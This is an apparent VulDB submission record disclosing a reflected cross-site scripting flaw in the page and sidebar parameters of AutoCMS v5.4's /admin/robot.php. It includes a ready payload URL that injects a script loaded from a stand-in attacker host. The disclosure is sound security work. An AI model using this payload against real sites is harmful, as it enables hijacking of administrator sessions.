| Titel | AutoCMS v5.4 Cross Site Scripting |
|---|
| Beschreibung | Summary
AutoCMS v5.4 was discovered to contain a XSS vulnerability via the sidebar parameter at /admin/robot.php.
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
Payload:
http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
|
|---|
| Quelle | ⚠️ https://github.com/Hebing123/cve/issues/68 |
|---|
| Benutzer | jiashenghe (UID 39445) |
|---|
| Einreichung | 13.09.2024 05:22 (vor 2 Jahren) |
|---|
| Moderieren | 14.09.2024 08:43 (1 day later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 277503 [AutoCMS 5.4 /admin/robot.php sidebar Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|